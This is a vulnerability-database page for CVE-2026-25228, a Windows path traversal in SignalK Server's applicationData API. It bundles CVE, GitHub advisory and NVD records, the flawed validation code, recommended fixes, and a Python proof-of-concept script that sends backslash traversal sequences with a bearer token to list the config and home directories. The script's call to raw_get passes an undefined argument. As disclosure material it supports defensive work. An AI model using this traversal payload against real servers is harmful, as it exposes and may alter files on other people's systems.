Vulnerability-Lookup

CVE-2026-25228 (GCVE-0-2026-25228)

Vulnerability from cvelistv5 – Published: 2026-02-02 23:02 – Updated: 2026-02-04 21:09

Title

SignalK Server has Path Traversal leading to information disclosure

Summary

Signal K Server is a server application that runs on a central hub in a boat. Prior to 2.20.3, a path traversal vulnerability in SignalK Server's applicationData API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The validateAppId() function blocks forward slashes (/) but not backslashes (\), which are treated as directory separators by path.join() on Windows. This enables attackers to escape the intended applicationData directory. This vulnerability is fixed in 2.20.3.

Severity ?

5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/SignalK/signalk-server/securit…	x_refsource_CONFIRM
	https://github.com/SignalK/signalk-server/commit/…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	SignalK	signalk-server	Affected: < 2.20.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25228",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-04T21:09:33.563045Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-04T21:09:42.637Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "signalk-server",
          "vendor": "SignalK",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.20.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Signal K Server is a server application that runs on a central hub in a boat. Prior to 2.20.3, a path traversal vulnerability in SignalK Server\u0027s applicationData API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The validateAppId() function blocks forward slashes (/) but not backslashes (\\), which are treated as directory separators by path.join() on Windows. This enables attackers to escape the intended applicationData directory. This vulnerability is fixed in 2.20.3."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-02T23:02:52.062Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx"
        },
        {
          "name": "https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7"
        }
      ],
      "source": {
        "advisory": "GHSA-vrhw-v2hw-jffx",
        "discovery": "UNKNOWN"
      },
      "title": "SignalK Server has Path Traversal leading to information disclosure"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25228",
    "datePublished": "2026-02-02T23:02:52.062Z",
    "dateReserved": "2026-01-30T14:44:47.328Z",
    "dateUpdated": "2026-02-04T21:09:42.637Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-25228\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-02T23:16:10.080\",\"lastModified\":\"2026-02-03T16:44:03.343\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Signal K Server is a server application that runs on a central hub in a boat. Prior to 2.20.3, a path traversal vulnerability in SignalK Server\u0027s applicationData API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The validateAppId() function blocks forward slashes (/) but not backslashes (\\\\), which are treated as directory separators by path.join() on Windows. This enables attackers to escape the intended applicationData directory. This vulnerability is fixed in 2.20.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N\",\"baseScore\":5.0,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.1,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-25228\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-04T21:09:33.563045Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-04T21:09:39.736Z\"}}], \"cna\": {\"title\": \"SignalK Server has Path Traversal leading to information disclosure\", \"source\": {\"advisory\": \"GHSA-vrhw-v2hw-jffx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"SignalK\", \"product\": \"signalk-server\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.20.3\"}]}], \"references\": [{\"url\": \"https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx\", \"name\": \"https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7\", \"name\": \"https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Signal K Server is a server application that runs on a central hub in a boat. Prior to 2.20.3, a path traversal vulnerability in SignalK Server\u0027s applicationData API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The validateAppId() function blocks forward slashes (/) but not backslashes (\\\\), which are treated as directory separators by path.join() on Windows. This enables attackers to escape the intended applicationData directory. This vulnerability is fixed in 2.20.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-02T23:02:52.062Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-25228\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-04T21:09:42.637Z\", \"dateReserved\": \"2026-01-30T14:44:47.328Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-02T23:02:52.062Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-VRHW-V2HW-JFFX

Vulnerability from github – Published: 2026-02-02 22:26 – Updated: 2026-02-03 16:13

Summary

SignalK Server has Path Traversal leading to information disclosure

Details

Summary

A Path Traversal vulnerability in SignalK Server's applicationData API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The validateAppId() function blocks forward slashes (/) but not backslashes (\), which are treated as directory separators by path.join() on Windows. This enables attackers to escape the intended applicationData directory.

Details

Platform: Windows (Linux only allows traversal up a single directory) Authentication Required: Yes (ability to write depends on user's permission)

The vulnerability exists in the validateAppId() function within the applicationData API handler. This function validates the appid parameter but only checks for forward slashes:

// Simplified vulnerable code pattern
function validateAppId(appid) {
  if (appid.includes('/') || appid.length >= 30) {
    return false;
  }
  return true;
}

// Later used in path construction
const dataPath = path.join(configPath, 'applicationData', 'users', deviceId, appid);

Root Cause: - The validation only blocks / characters - On Windows, path.join() uses the platform's native path separator - Windows treats both / and \ as valid directory separators - Backslash-based traversal sequences like ..\..\.. pass validation - When path.join() processes these on Windows, each .. traverses up one directory level

PoC

#!/usr/bin/env python3

import argparse
import http.client
import json
import sys
from urllib.parse import urlparse

PREFIX = "/signalk/v1/applicationData"


def raw_get(base, path, token):
    """
    GET using http.client so that '..' and backslashes in the URL
    are sent literally (requests/urllib would normalise them away).
    """
    parsed = urlparse(base)
    host, port = parsed.hostname, parsed.port or 80
    conn = http.client.HTTPConnection(host, port)
    conn.request("GET", path, headers={"Authorization": f"Bearer {token}"})
    resp = conn.getresponse()
    status = resp.status
    body = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return status, body


def main():
    ap = argparse.ArgumentParser(description="Signal K Windows path traversal PoC")
    ap.add_argument("--target", required=True, help="e.g. http://192.168.1.100:3000")
    ap.add_argument("--token", required=True, help="any valid JWT token")
    args = ap.parse_args()

    base = args.target.rstrip("/")

    # On Windows, path.join(configPath, "applicationData", "users", id, appid)
    # resolves each '..' upward when separated by backslashes.
    #
    # Depth from base (configPath/applicationData/users/):
    #   ..              → applicationData/users/          (1 level)
    #   ..\..           → applicationData/                (2 levels)
    #   ..\..\..        → configPath (.signalk)           (3 levels)
    #   ..\..\..\..     → user home directory             (4 levels)

    traversals = [
        ("..\\..\\..\\", ".signalk config directory"),
        ("..\\..\\..\\..\\", "user home directory"),
    ]

    for appid, description in traversals:
        path = f"{PREFIX}/user/{appid}"
        status, body = raw_get(base, path, token, args.token)

        print(f"[{status}] {description}")
        print(f"  GET {path}")

        if status == 200:
            try:
                entries = json.loads(body)
                for entry in entries:
                    print(f"    {entry}")
            except json.JSONDecodeError:
                print(f"    {body[:200]}")
        else:
            print(f"    {body[:200]}")
        print()


if __name__ == "__main__":
    main()

Reproduction Steps:

Set up SignalK Server on a Windows machine
Obtain a valid device or user authentication token
Run the PoC script: bash python3 poc_windows_appid_traversal.py --target http://[signalK server IP]:3000 --token <YOUR_TOKEN>

Recommended Fix

Short-term: 1. Add backslash validation to validateAppId(): javascript function validateAppId(appid) { if (appid.includes('/') || appid.includes('\') || appid.length >= 30) { return false; } return true; }

Use path.normalize() and validate that resolved paths remain within the intended directory: javascript const resolvedPath = path.normalize(path.join(baseDir, appid)); if (!resolvedPath.startsWith(path.normalize(baseDir))) { throw new Error('Invalid path'); }

Severity ?

5.0 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.20.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "signalk-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.20.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25228"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-02T22:26:31Z",
    "nvd_published_at": "2026-02-02T23:16:10Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA Path Traversal vulnerability in SignalK Server\u0027s `applicationData` API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The `validateAppId()` function blocks forward slashes (`/`) but not backslashes (`\\`), which are treated as directory separators by `path.join()` on Windows. This enables attackers to escape the intended `applicationData` directory.\n\n### Details\n**Platform**: Windows (Linux only allows traversal up a single directory)\n**Authentication Required**: Yes (ability to write depends on user\u0027s permission)\n\nThe vulnerability exists in the `validateAppId()` function within the applicationData API handler. This function validates the `appid` parameter but only checks for forward slashes:\n\n```javascript\n// Simplified vulnerable code pattern\nfunction validateAppId(appid) {\n  if (appid.includes(\u0027/\u0027) || appid.length \u003e= 30) {\n    return false;\n  }\n  return true;\n}\n\n// Later used in path construction\nconst dataPath = path.join(configPath, \u0027applicationData\u0027, \u0027users\u0027, deviceId, appid);\n```\n\n**Root Cause:**\n- The validation only blocks `/` characters\n- On Windows, `path.join()` uses the platform\u0027s native path separator\n- Windows treats both `/` and `\\` as valid directory separators\n- Backslash-based traversal sequences like `..\\..\\..` pass validation\n- When `path.join()` processes these on Windows, each `..` traverses up one directory level\n\n### PoC\n```python\n#!/usr/bin/env python3\n\nimport argparse\nimport http.client\nimport json\nimport sys\nfrom urllib.parse import urlparse\n\nPREFIX = \"/signalk/v1/applicationData\"\n\n\ndef raw_get(base, path, token):\n    \"\"\"\n    GET using http.client so that \u0027..\u0027 and backslashes in the URL\n    are sent literally (requests/urllib would normalise them away).\n    \"\"\"\n    parsed = urlparse(base)\n    host, port = parsed.hostname, parsed.port or 80\n    conn = http.client.HTTPConnection(host, port)\n    conn.request(\"GET\", path, headers={\"Authorization\": f\"Bearer {token}\"})\n    resp = conn.getresponse()\n    status = resp.status\n    body = resp.read().decode(\"utf-8\", errors=\"replace\")\n    conn.close()\n    return status, body\n\n\ndef main():\n    ap = argparse.ArgumentParser(description=\"Signal K Windows path traversal PoC\")\n    ap.add_argument(\"--target\", required=True, help=\"e.g. http://192.168.1.100:3000\")\n    ap.add_argument(\"--token\", required=True, help=\"any valid JWT token\")\n    args = ap.parse_args()\n\n    base = args.target.rstrip(\"/\")\n\n    # On Windows, path.join(configPath, \"applicationData\", \"users\", id, appid)\n    # resolves each \u0027..\u0027 upward when separated by backslashes.\n    #\n    # Depth from base (configPath/applicationData/users/):\n    #   ..              \u2192 applicationData/users/          (1 level)\n    #   ..\\..           \u2192 applicationData/                (2 levels)\n    #   ..\\..\\..        \u2192 configPath (.signalk)           (3 levels)\n    #   ..\\..\\..\\..     \u2192 user home directory             (4 levels)\n\n    traversals = [\n        (\"..\\\\..\\\\..\\\\\", \".signalk config directory\"),\n        (\"..\\\\..\\\\..\\\\..\\\\\", \"user home directory\"),\n    ]\n\n    for appid, description in traversals:\n        path = f\"{PREFIX}/user/{appid}\"\n        status, body = raw_get(base, path, token, args.token)\n\n        print(f\"[{status}] {description}\")\n        print(f\"  GET {path}\")\n\n        if status == 200:\n            try:\n                entries = json.loads(body)\n                for entry in entries:\n                    print(f\"    {entry}\")\n            except json.JSONDecodeError:\n                print(f\"    {body[:200]}\")\n        else:\n            print(f\"    {body[:200]}\")\n        print()\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n**Reproduction Steps:**\n\n1. Set up SignalK Server on a Windows machine\n2. Obtain a valid device or user authentication token\n3. Run the PoC script:\n   ```bash\n   python3 poc_windows_appid_traversal.py --target http://[signalK server IP]:3000 --token \u003cYOUR_TOKEN\u003e\n   ```\n\n### Recommended Fix\n\n**Short-term:**\n1. Add backslash validation to `validateAppId()`:\n   ```javascript\n   function validateAppId(appid) {\n     if (appid.includes(\u0027/\u0027) || appid.includes(\u0027\\\u0027) || appid.length \u003e= 30) {\n       return false;\n     }\n     return true;\n   }\n   ```\n\n2. Use `path.normalize()` and validate that resolved paths remain within the intended directory:\n   ```javascript\n   const resolvedPath = path.normalize(path.join(baseDir, appid));\n   if (!resolvedPath.startsWith(path.normalize(baseDir))) {\n     throw new Error(\u0027Invalid path\u0027);\n   }\n   ```",
  "id": "GHSA-vrhw-v2hw-jffx",
  "modified": "2026-02-03T16:13:32Z",
  "published": "2026-02-02T22:26:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25228"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/SignalK/signalk-server"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SignalK Server has Path Traversal leading to information disclosure"
}

FKIE_CVE-2026-25228

Vulnerability from fkie_nvd - Published: 2026-02-02 23:16 - Updated: 2026-02-03 16:44

Severity ?

5.0 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7
	security-advisories@github.com	https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Signal K Server is a server application that runs on a central hub in a boat. Prior to 2.20.3, a path traversal vulnerability in SignalK Server\u0027s applicationData API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The validateAppId() function blocks forward slashes (/) but not backslashes (\\), which are treated as directory separators by path.join() on Windows. This enables attackers to escape the intended applicationData directory. This vulnerability is fixed in 2.20.3."
    }
  ],
  "id": "CVE-2026-25228",
  "lastModified": "2026-02-03T16:44:03.343",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-02T23:16:10.080",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/SignalK/signalk-server/commit/9bcf61c8fe2cb8a40998b913a02fb64dff9e86c7"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-vrhw-v2hw-jffx"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-25228 (GCVE-0-2026-25228)

GHSA-VRHW-V2HW-JFFX

Summary

Details

PoC

Recommended Fix

FKIE_CVE-2026-25228

Tags

Sightings

Nomenclature